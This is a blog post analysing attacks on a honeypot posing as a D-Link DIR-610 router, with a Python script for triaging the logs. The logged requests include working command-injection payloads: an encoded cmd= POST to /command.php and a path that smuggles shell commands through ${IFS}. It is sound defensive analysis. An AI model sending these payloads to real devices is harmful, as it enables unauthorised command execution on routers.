DIR-610 exploit attack on a Honeypot

Original article: https://jsonsecurity.blogspot.com/2017/01/dir-610-exploit-at 2017-01-12 04:18:55

On my honeypot I come across this sort of attack quite often. We need to keep in mind that my honeypot will always reply with "200 OK", whatever you send to it.

2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /cgi/common.cgi HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /stssys.htm HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'GET / HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}

2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 208\r\n\r\ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74']}

The POST body, translated with urllib.unquote(), becomes

cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}&&echo${IFS} 610cker >qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
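The manual decoding above can be automated for triage. The following Python 3 sketch is an added example, not code from the original post: it parses entries in the log format shown, checks Content-Length against the body, URL-decodes target and body, and flags shell-injection markers. The names analyze and INDICATORS and the indicator list are assumptions; urllib.parse.unquote is the Python 3 name for urllib.unquote.

```python
import ast
import re
from urllib.parse import unquote

# Sample input: the POST entry from the log, header/body separator written as \r\n\r\n.
POST_LINE = (
    r"2017-01-09 16:53:56 -- {'http': ['181.223.38.29', "
    r"'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\n"
    r"User-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    r"Content-Length: 208\r\n\r\ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20"
    r"%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20"
    r"%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20"
    r"%36%31%30%63%6B%65%72%2E%74%78%74']}"
)
# The final GET entry from the log, headers abridged.
GET_LINE = (
    r"2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}"
    r"&&echo${IFS} 610cker >qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\n\r\n']}"
)

# Assumed indicator list for shell command injection; extend for your own traffic.
INDICATORS = {
    "command chaining": re.compile(r"&&|\|\||;"),
    "IFS whitespace evasion": re.compile(r"\$\{?IFS\}?"),
    "output redirection": re.compile(r">"),
    "command substitution": re.compile(r"`|\$\("),
}

def analyze(line):
    """Parse one "<timestamp> -- {'http': [ip, raw_request]}" entry and triage it."""
    timestamp, _, record = line.partition(" -- ")
    src_ip, raw = ast.literal_eval(record)["http"]   # literal_eval never executes code
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {k.lower(): v for k, v in (h.split(": ", 1) for h in header_lines)}
    method, rest = request_line.split(" ", 1)
    target, _version = rest.rsplit(" ", 1)   # the target itself may contain spaces
    declared = headers.get("content-length")   # None when the header is absent
    decoded = unquote(target) + "\n" + unquote(body)
    return {
        "time": timestamp, "src": src_ip, "method": method,
        "target": unquote(target), "body": unquote(body),
        "length_ok": None if declared is None else int(declared) == len(body.encode()),
        "flags": sorted(n for n, rx in INDICATORS.items() if rx.search(decoded)),
    }

if __name__ == "__main__":
    for entry in (POST_LINE, GET_LINE):
        print(analyze(entry))
```

The length check confirms that the 208-byte body begins at cmd=, and the GET entry shows ${IFS} standing in for spaces inside the URL path.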
